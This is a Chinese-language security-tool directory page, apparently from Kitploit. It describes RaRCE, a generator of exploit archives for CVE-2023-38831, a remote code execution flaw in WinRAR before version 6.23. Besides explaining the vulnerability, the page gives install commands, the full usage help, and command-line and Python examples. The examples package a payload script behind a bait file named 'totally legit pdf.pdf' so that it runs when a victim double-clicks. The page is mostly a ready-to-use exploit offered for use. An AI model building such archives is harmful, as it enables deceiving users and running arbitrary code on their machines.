Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-38831-RaRCE — 一个易于安装和易于运行的工具,用于生成针对CVE-2023-38831(WinRAR 6.23之前版本的远程代码执行漏洞)的漏洞利用载荷。 | Kitploit
工具/GitHubGitHub/ignis-sec/cve-2023-38831-rarce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubignis-sec/cve-2023-38831-rarce

CVE-2023-38831-RaRCE

一个易于安装和易于运行的工具,用于生成针对CVE-2023-38831(WinRAR 6.23之前版本的远程代码执行漏洞)的漏洞利用载荷。

查看仓库
1131823年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

RaRCE,CVE-2023-38831漏洞的利用生成器

Contributors Forks Stargazers Issues GitHub

这是一个易于安装和使用、多功能的利用生成器,针对CVE-2023-38831,该漏洞影响6.23版本之前的WinRAR。

RARLabs WinRAR 6.23之前版本允许攻击者在用户尝试查看ZIP存档中的良性文件时执行任意代码。问题在于ZIP存档可能包含一个良性文件(如普通的.JPG文件)以及一个与该良性文件同名的文件夹,当仅尝试访问该良性文件时,文件夹的内容(可能包含可执行内容)会被处理。该漏洞于2023年4月至8月在野外被利用。

如何安装

使用pip

你可以通过pip轻松安装该工具。

root@kitploit:~
pip install rarce

或者,你可以从源代码使用。

root@kitploit:~
git clone https://github.com/ignis-sec/CVE-2023-38831-RaRCE
cd CVE-2023-38831-RaRCE
python3 setup.py install

使用方法

root@kitploit:~
usage: rarce [-h] [-v] [-i] [-dt] [-pt PRESERVE_TEMP] bait switch output

CVE-2023-38831的利用生成器

positional arguments:
  bait                  要添加到存档中的诱饵文件路径。
  switch                要替换诱饵文件的有效负载路径(双击时运行)。
  output                输出文件路径。

optional arguments:
  -h, --help            显示此帮助信息并退出。
  -v, --verbose         详细输出。
  -i, --ignore-path-check
                        忽略路径有效性检查。如果指定,rarce可以覆盖output参数中已有的文件,并可以为输出路径创建缺失的文件夹。
  -dt, --dont-use-tempdir
                        防止工具在创建利用时创建临时目录。而是在当前工作目录中创建中间文件夹。
  -pt PRESERVE_TEMP, --preserve-temp PRESERVE_TEMP
                        创建利用后保留临时目录。如果未指定-dt或--dont-use-tempdir,则无效。

通过pip或setup.py安装后,你可以从命令行使用此工具。以下命令将为你创建利用文件。当用户双击诱饵文件时,有效负载脚本或可执行文件将取而代之运行。

root@kitploit:~
$ rarce "totally legit pdf.pdf" "payload.cmd" "exploit.rar"

可选地,你可以将其作为可运行模块使用。

root@kitploit:~
python -m rarce "totally legit pdf.pdf" "payload.cmd" "exploit.rar"

你也可以在现有代码中使用它。

root@kitploit:~
from rarce import exploit

exploit("totally legit pdf.pdf", "payload.cmd", "exploit.rar")
下载工具